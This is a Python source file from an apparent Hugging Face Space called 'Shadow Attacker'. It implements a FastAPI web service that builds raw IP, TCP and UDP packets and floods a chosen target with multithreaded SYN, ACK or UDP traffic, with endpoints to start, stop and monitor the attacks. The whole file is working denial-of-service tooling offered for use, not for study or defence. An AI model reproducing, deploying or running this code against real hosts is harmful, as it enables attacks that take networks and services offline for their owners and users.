1 / main.py
rkihacker's picture
Update main.py
308d273 verified
raw
history blame
8.28 kB
# --------------------------------------------------------------
# Shadow Attacker – FastAPI + raw sockets (works in HF Docker)
# --------------------------------------------------------------
import random
import socket
import struct
import threading
import time
from collections import deque
from typing import Dict, Optional
import uvicorn
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
# ------------------------------------------------------------------
# Logging + global state (thread-safe)
# ------------------------------------------------------------------
import logging
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s %(message)s",
)
log = logging.getLogger(__name__)
app = FastAPI(title="Shadow Attacker")
# attack_id β†’ stop_event
stop_events: Dict[str, threading.Event] = {}
# attack_id β†’ packets_sent
counters: Dict[str, int] = {}
counters_lock = threading.Lock()
# global total + rolling log (max 200 entries)
total_packets = 0
log_buffer: deque[str] = deque(maxlen=200)
def _log(msg: str):
"""Thread-safe log β†’ console + rolling buffer."""
log.info(msg)
log_buffer.append(f"{time.strftime('%H:%M:%S')} {msg}")
# ------------------------------------------------------------------
# Pydantic models
# ------------------------------------------------------------------
class StartRequest(BaseModel):
target: str
port: Optional[int] = None # if None β†’ random 1-65535
threads: int = 10
attack_type: str = "udp" # syn | ack | udp | udp_pps
class StatusResponse(BaseModel):
running: bool
attack_id: Optional[str]
total_packets: int
counters: Dict[str, int]
logs: list[str]
# ------------------------------------------------------------------
# Helper networking functions
# ------------------------------------------------------------------
def resolve_target(host: str) -> bytes:
"""Return IPv4 bytes (4)."""
ip = socket.gethostbyname(host)
return socket.inet_aton(ip)
def get_local_ip(dst_ip: bytes) -> bytes:
"""Pick a source IP that can route to dst_ip."""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((socket.inet_ntoa(dst_ip), 53))
return socket.inet_aton(s.getsockname()[0])
finally:
s.close()
def checksum(data: bytes) -> int:
s = 0
for i in range(0, len(data), 2):
if i + 1 < len(data):
w = (data[i] << 8) | data[i + 1]
else:
w = data[i] << 8
s += w
while s >> 16:
s = (s & 0xFFFF) + (s >> 16)
return ~s & 0xFFFF
def pseudo_checksum(src: bytes, dst: bytes, proto: int, length: int) -> int:
s = 0
for i in range(0, 4, 2):
s += (src[i] << 8) | src[i + 1]
s += (dst[i] << 8) | dst[i + 1]
s += proto
s += length
while s >> 16:
s = (s & 0xFFFF) + (s >> 16)
return s
def build_ip_header(src_ip: bytes, dst_ip: bytes, proto: int, payload_len: int) -> bytes:
total = 20 + payload_len
ip = bytearray(20)
ip[0] = 0x45
struct.pack_into("!HHBB", ip, 2, total, random.randint(0, 0xFFFF), 64, proto)
ip[12:16] = src_ip
ip[16:20] = dst_ip
struct.pack_into("!H", ip, 10, checksum(ip))
return bytes(ip)
def build_tcp_packet(src_ip, dst_ip, src_p, dst_p, seq, ack, flags):
tcp = bytearray(20)
struct.pack_into("!HHIIBBHHH", tcp, 0,
src_p, dst_p, seq, ack,
5 << 4, flags, 65535, 0, 0)
pseudo = pseudo_checksum(src_ip, dst_ip, socket.IPPROTO_TCP, 20)
cs = checksum(struct.pack("!I", pseudo) + tcp)
struct.pack_into("!H", tcp, 16, cs)
ip = build_ip_header(src_ip, dst_ip, socket.IPPROTO_TCP, 20)
return ip + tcp
def build_udp_packet(src_ip, dst_ip, src_p, dst_p, payload: bytes):
udp_len = 8 + len(payload)
udp = bytearray(8)
struct.pack_into("!HHHH", udp, 0, src_p, dst_p, udp_len, 0)
pseudo = pseudo_checksum(src_ip, dst_ip, socket.IPPROTO_UDP, udp_len)
cs = checksum(struct.pack("!I", pseudo) + udp + payload)
struct.pack_into("!H", udp, 6, cs)
ip = build_ip_header(src_ip, dst_ip, socket.IPPROTO_UDP, udp_len)
return ip + udp
# ------------------------------------------------------------------
# The real flood worker (pure thread, no asyncio)
# ------------------------------------------------------------------
def flood_worker(
attack_id: str,
dst_ip: bytes,
src_ip: bytes,
dst_port: int,
payload: bytes,
stop_event: threading.Event,
kind: str,
):
global total_packets
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
try:
while not stop_event.is_set():
src_port = random.randint(1024, 65535)
if kind == "syn":
pkt = build_tcp_packet(src_ip, dst_ip, src_port, dst_port,
random.randint(0, 2**32-1), 0, 0x02)
elif kind == "ack":
pkt = build_tcp_packet(src_ip, dst_ip, src_port, dst_port,
random.randint(0, 2**32-1),
random.randint(0, 2**32-1), 0x10)
else: # udp / udp_pps
pkt = build_udp_packet(src_ip, dst_ip, src_port, dst_port, payload)
sock.sendto(pkt, (socket.inet_ntoa(dst_ip), 0))
# ---------- COUNTER ----------
with counters_lock:
counters[attack_id] = counters.get(attack_id, 0) + 1
total_packets += 1
# -----------------------------
except Exception as e:
_log(f"[!] Worker error ({attack_id}): {e}")
finally:
sock.close()
# ------------------------------------------------------------------
# API routes
# ------------------------------------------------------------------
@app.post("/start")
def start_attack(req: StartRequest):
global total_packets
if any(not ev.is_set() for ev in stop_events.values()):
raise HTTPException(400, "An attack is already running")
attack_id = f"{req.target}_{int(time.time())}"
stop_ev = threading.Event()
stop_events[attack_id] = stop_ev
dst_ip = resolve_target(req.target)
src_ip = get_local_ip(dst_ip)
dst_port = req.port or random.randint(1, 65535)
payload = b""
if req.attack_type == "udp":
payload = bytes(random.getrandbits(8) for _ in range(1200))
# udp_pps β†’ empty payload for max PPS
# spawn worker threads
for _ in range(req.threads):
t = threading.Thread(
target=flood_worker,
args=(attack_id, dst_ip, src_ip, dst_port, payload, stop_ev, req.attack_type),
daemon=True,
)
t.start()
_log(f"STARTED {req.attack_type.upper()} β†’ {req.target}:{dst_port} ({req.threads} threads) – ID {attack_id}")
return {"message": "attack started", "attack_id": attack_id}
@app.post("/stop")
def stop_attack(attack_id: Optional[str] = None):
if attack_id and attack_id in stop_events:
stop_events[attack_id].set()
del stop_events[attack_id]
with counters_lock:
counters.pop(attack_id, None)
_log(f"STOPPED attack {attack_id}")
else:
for ev in stop_events.values():
ev.set()
stop_events.clear()
with counters_lock:
counters.clear()
_log("STOPPED ALL attacks")
return {"message": "stopped"}
@app.get("/status", response_model=StatusResponse)
def status(attack_id: Optional[str] = None):
with counters_lock:
cnt = {k: v for k, v in counters.items()}
tot = total_packets
running = bool(stop_events)
aid = attack_id if attack_id in stop_events else None
return StatusResponse(
running=running,
attack_id=aid,
total_packets=tot,
counters=cnt if not attack_id else {attack_id: cnt.get(attack_id, 0)},
logs=list(log_buffer),
)
# ------------------------------------------------------------------
# Entrypoint
# ------------------------------------------------------------------
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000)